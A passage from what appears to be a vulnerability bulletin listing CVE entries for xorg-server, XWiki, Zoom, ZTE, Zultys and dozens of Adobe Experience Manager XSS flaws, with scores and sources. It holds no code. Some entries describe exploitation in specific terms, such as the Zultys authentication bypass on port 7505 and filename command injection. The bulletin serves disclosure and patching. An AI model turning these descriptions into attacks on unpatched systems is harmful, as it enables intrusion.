xorg-server — xorg-server A flaw was found in xorg-server. A specially crafted request to RRChangeProviderProperty or RRChangeOutputProperty can trigger an integer overflow which may lead to a disclosure of sensitive information. 2023-12-13 7.6 CVE-2023-6478
secalert@redhat.com
xorg-server — xorg-server A flaw was found in xorg-server. Querying or changing XKB button actions such as moving from a touchpad to a mouse can result in out-of-bounds memory reads and writes. This may allow local privilege escalation or possible remote code execution in cases where X11 forwarding is involved. 2023-12-13 7.8 CVE-2023-6377
secalert@redhat.com
xwiki — xwiki-platform XWiki Platform is a generic wiki platform. Starting in 4.5-rc-1 and prior to versions 14.10.15, 15.5.2, and 15.7-rc-1, the search administration interface doesn’t properly escape the id and label of search user interface extensions, allowing the injection of XWiki syntax containing script macros including Groovy macros that allow remote code execution, impacting the confidentiality, integrity and availability of the whole XWiki instance. This attack can be executed by any user who can edit some wiki page like the user’s profile (editable by default) as user interface extensions that will be displayed in the search administration can be added on any document by any user. The necessary escaping has been added in XWiki 14.10.15, 15.5.2 and 15.7RC1. As a workaround, the patch can be manually applied to the page `XWiki.SearchAdmin`. 2023-12-15 9.9 CVE-2023-50721
security-advisories@github.com
xwiki — xwiki-platform XWiki Platform is a generic wiki platform. Starting in 2.3 and prior to versions 14.10.15, 15.5.2, and 15.7-rc-1, there is a reflected XSS or also direct remote code execution vulnerability in the code for displaying configurable admin sections. The code that can be passed through a URL parameter is only executed when the user who is visiting the crafted URL has edit right on at least one configuration section. While any user of the wiki could easily create such a section, this vulnerability doesn’t require the attacker to have an account or any access on the wiki. It is sufficient to trick any admin user of the XWiki installation to visit the crafted URL. This vulnerability allows full remote code execution with programming rights and thus impacts the confidentiality, integrity and availability of the whole XWiki installation. This has been fixed in XWiki 14.10.15, 15.5.2 and 15.7RC1. The patch can be manually applied to the document `XWiki.ConfigurableClass`. 2023-12-15 9.6 CVE-2023-50722
security-advisories@github.com
xwiki — xwiki-platform XWiki Platform is a generic wiki platform. Starting in 2.3 and prior to versions 14.10.15, 15.5.2, and 15.7-rc-1, anyone who can edit an arbitrary wiki page in an XWiki installation can gain programming right through several cases of missing escaping in the code for displaying sections in the administration interface. This impacts the confidentiality, integrity and availability of the whole XWiki installation. Normally, all users are allowed to edit their own user profile so this should be exploitable by all users of the XWiki instance. This has been fixed in XWiki 14.10.15, 15.5.2 and 15.7RC1. The patches can be manually applied to the `XWiki.ConfigurableClassMacros` and `XWiki.ConfigurableClass` pages. 2023-12-15 9.9 CVE-2023-50723
security-advisories@github.com
xwiki — xwiki-platform XWiki Platform is a generic wiki platform. Starting in 7.2-milestone-2 and prior to versions 14.10.15, 15.5.2, and 15.7-rc-1, the Solr-based search in XWiki discloses the password hashes of all users to anyone with view right on the respective user profiles. By default, all user profiles are public. This vulnerability also affects any configurations used by extensions that contain passwords like API keys that are viewable for the attacker. Normally, such passwords aren’t accessible but this vulnerability would disclose them as plain text. This has been patched in XWiki 14.10.15, 15.5.2 and 15.7RC1. There are no known workarounds for this vulnerability. 2023-12-15 7.5 CVE-2023-50719
security-advisories@github.com
zammad — zammad An issue was discovered in Zammad before 6.2.0. Due to lack of rate limiting in the “email address verification” feature, an attacker could send many requests for a known address to cause Denial Of Service (generation of many emails, which would also spam the victim). 2023-12-10 7.5 CVE-2023-50455
cve@mitre.org
zoom — multiple_products Improper access control in Zoom Mobile App for iOS and Zoom SDKs for iOS before version 5.16.5 may allow an authenticated user to conduct a disclosure of information via network access. 2023-12-13 7.1 CVE-2023-43585
security@zoom.us
zoom — multiple_products Path traversal in Zoom Desktop Client for Windows, Zoom VDI Client for Windows, and Zoom SDKs for Windows may allow an authenticated user to conduct an escalation of privilege via network access. 2023-12-13 7.3 CVE-2023-43586
security@zoom.us
zte — mc801a There is a command injection vulnerability in some ZTE mobile internet products. Due to insufficient input validation of multiple network parameters, an authenticated attacker could use the vulnerability to execute arbitrary commands. 2023-12-14 8.4 CVE-2023-25643
psirt@zte.com.cn
zultys — multiple_products A SQL injection vulnerability in Zultys MX-SE, MX-SE II, MX-E, MX-Virtual, MX250, and MX30 with firmware versions prior to 17.0.10 patch 17161 and 16.04 patch 16109 allows an authenticated attacker to execute arbitrary SQL queries on the backend database via the filter parameter in requests to the /newapi/ endpoint in the Zultys MX web interface. 2023-12-08 8.8 CVE-2023-43743
cve@mitre.org
zultys — mx-se_firmware An authentication bypass in Zultys MX-SE, MX-SE II, MX-E, MX-Virtual, MX250, and MX30 with firmware versions prior to 17.0.10 patch 17161 and 16.04 patch 16109 allows an unauthenticated attacker to obtain an administrative session via a protection mechanism failure in the authentication function. In normal operation, the Zultys MX Administrator Windows client connects to port 7505 and attempts authentication, submitting the administrator username and password to the server. Upon authentication failure, the server sends a login failure message prompting the client to disconnect. However, if the client ignores the failure message instead and attempts to continue, the server does not forcibly close the connection and processes all subsequent requests from the client as if authentication had been successful. 2023-12-08 9.8 CVE-2023-43742
cve@mitre.org
zultys — mx-se_firmware An OS command injection vulnerability in Zultys MX-SE, MX-SE II, MX-E, MX-Virtual, MX250, and MX30 with firmware versions prior to 17.0.10 patch 17161 and 16.04 patch 16109 allows an administrator to execute arbitrary OS commands via a file name parameter in a patch application function. The Zultys MX Administrator client has a “Patch Manager” section that allows administrators to apply patches to the device. The user supplied filename for the patch file is passed to a shell script without validation. Including bash command substitution characters in a patch file name results in execution of the provided command. 2023-12-08 7.2 CVE-2023-43744
cve@mitre.org

Medium Vulnerabilities

Primary Vendor — Product | Description | Published | CVSS Score | Source & Patch Info
adobe — after_effects Adobe After Effects versions 24.0.3 (and earlier) and 23.6.0 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-12-13 5.5 CVE-2023-48635
psirt@adobe.com
adobe — css-tools @adobe/css-tools versions 4.3.1 and earlier are affected by an Improper Input Validation vulnerability that could result in a denial of service while attempting to parse CSS. 2023-12-14 5.3 CVE-2023-48631
psirt@adobe.com
adobe — dimension Adobe Dimension versions 3.4.10 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-12-13 5.5 CVE-2023-47061
psirt@adobe.com
adobe — dimension Adobe Dimension versions 3.4.10 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-12-13 5.5 CVE-2023-47062
psirt@adobe.com
adobe — dimension Adobe Dimension versions 3.4.10 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-12-13 5.5 CVE-2023-47078
psirt@adobe.com
adobe — dimension Adobe Dimension versions 3.4.10 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-12-13 5.5 CVE-2023-47079
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-47064
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-47065
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48440
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by an Improper Access Control vulnerability. An attacker could leverage this vulnerability to achieve a low-confidentiality impact within the application. Exploitation of this issue does not require user interaction. 2023-12-15 5.3 CVE-2023-48441
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48442
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48443
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48444
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48445
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48446
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48447
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48448
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48449
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48450
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48451
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48452
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48453
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48454
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48455
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48456
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48457
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48458
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48459
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48460
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48461
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48462
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48463
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48464
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48465
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48466
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48467
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48468
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48469
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48470
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48471
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48472
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48473
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48474
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48475
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48476
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48477
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48478
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48479
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48480
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48481
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48482
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48483
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48484
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48485
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48486
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48487
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48488
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48489
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48490
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48491
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48492
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48493
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48494
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48495
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48496
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48497
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48498
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48499
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48500
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48501
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48502
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48503
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48504
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48505
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48506
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48507
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48508
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48509
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48510
psirt@adobe.com
